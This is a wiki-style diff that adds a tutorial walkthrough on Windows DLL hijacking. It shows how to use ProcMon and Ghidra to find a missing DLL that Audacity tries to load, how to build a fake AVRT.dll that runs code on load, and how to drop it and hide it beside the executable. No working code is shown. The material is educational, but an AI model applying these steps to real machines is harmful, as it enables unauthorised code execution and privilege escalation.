| ... | @@ -7,9 +7,54 @@ DLL (Dynamic Link Library) files are a Windows exclusive way of increasing compa |
... | @@ -7,9 +7,54 @@ DLL (Dynamic Link Library) files are a Windows exclusive way of increasing compa |
|
|
Microsoft has released several updates to combat DLL Hijacking, most notable SafeDLLSearchMode (enabled by default on most Windows installs). This changes the order in which Windows searches for DLL files which makes it's impossible to overwrite system DLL files and limits the amount of applications of this method.
|
|
Microsoft has released several updates to combat DLL Hijacking, most notable SafeDLLSearchMode (enabled by default on most Windows installs). This changes the order in which Windows searches for DLL files which makes it's impossible to overwrite system DLL files and limits the amount of applications of this method.
|
|
|
Cases in which it's possible to still DLL Hijack are:
|
|
Cases in which it's possible to still DLL Hijack are:
|
|
|
* The Application loads a DLL that isn't available on the system (This will sometimes crash the program but often the DLL isn't an essential one)
|
|
* The Application loads a DLL that isn't available on the system (This will sometimes crash the program but often the DLL isn't an essential one)
|
|
|
* The Application is in a directory that isn't permissions protected (This is many Window app installers install into C:\Program Files or C:\Program Files (x86))
|
|
* The Application is in a directory that isn't permissions protected (This is why many Window app installers install into C:\Program Files or C:\Program Files (x86))
|
|
|
|
|
|
|
|
## Walk-through
|
|
## Walk-through
|
|
|
|
|
|
|
|
|
##### This section is encompass a walk-through of finding vulnerable programs and making DLL hijacking them to get escalated code execution.
|
|
|
|
|
|
|
|
The easiest way to find vulnerable program to search a CVE database.
|
|
|
|
In the example I use for this walk-trough I used https://cve.mitre.org/ and looked for commonly used programs susceptible to DLL Hijacking.
|
|
|
|
I settled on using Audacity, an open-source audio mixing software, as my attack vector.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
I set up a Windows 10 VM and installed Audacity to a folder on the desktop (Here you don't need escalated privilege to move/rename files). To find what a program is loading from the Windows File system you can use a program that Microsoft provides for free called Process Monitor, or just ProcMon for short.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ProcMon will display what DLL files a program is trying to load and if it is successful loading such files. So start up ProcMon and the program that you are testing for vulnerabilities. The best DLLs to use are those that the program can't find but try to load. You can apply a filter in ProcMon to easily find these (if there are any).
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
The result of the filter should look something like this. Note the location the file is looked for in. The ones that aren't in System protected folders are your entry point.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Of those I settled on using AVRT.dll to hijack. I suggest waiting until you know what functions the program calls from the dll before choosing. Programs rely on some dll files more than others, the easiest to implement will have less function calls. Sadly Procmon doesn't tell what functions a program needs from those dlls so the next step is to run the program through Ghidra to find what functions are used.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
After Ghidra chews through the program you should have symbol tree on the left. Under the Imports folder will a be a listing of DLLs and functions called by the program when it's running. In the image above for an example, you can see that Audacity loads ADVAPI32.DLL and calls the RegOpenKeyExA and RegQueryValueExA functions. **When making a fake DLL file you MUST at least implement every function the the program calls**. Other wise the program will crash and you won't get code execution from the DLL. The functions don't have to do anything, you can actually add additional code execution to them, they just need to exist in name in the file.
|
|
|
|
|
|
|
|
Weirdly enough AVRT.dll doesn't have an function calls in Audacity but that's ok because as long as it loads the dll we can get code execution.
|
|
|
|
|
|
|
|
Now that we have the target dll and the functions that are called it's time to make a fake DLL to replace it. The best program for this is Visual Studio. You can just make a dll project which will start you with all basic code needed for a function dll.
|
|
|
|
|
|
|
|
My custom AVRT.dll looks something like this:
|
|
|
|
|
|
|
|
|
|
|
|
This dll spawns a new cmd window every 5 seconds audacity is open, it's more to be annoying than malicious but you could also make basically any system call or execute power shell script with this method as well. The DLLMain is the same as any main function in a general c++ program and DLL_PROCESS_ATTACH is called when the dll is loaded by the program which means you can put code there to have it execute on load.
|
|
|
|
|
|
|
|
After writing the code just build the dll in VS. Then rename it and drop it somewhere the program will execute, the safest bet is in the same folder as the program executable.
|
|
|
|
|
|
|
|
|
|
|
|
Notice how the dll doesn't standout, it looks just like any other dll file that was packaged with the program. You can even take advantage of OS features like hidden files to hide it better if so desired. Now that everything is set up, it's time execute the program and see if the dll code loads.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Sources:
|
|
#### Sources:
|
|
|
https://hacknpentest.com/windows-privilege-escalation-dll-hijacking/ |
|
https://hacknpentest.com/windows-privilege-escalation-dll-hijacking/ |
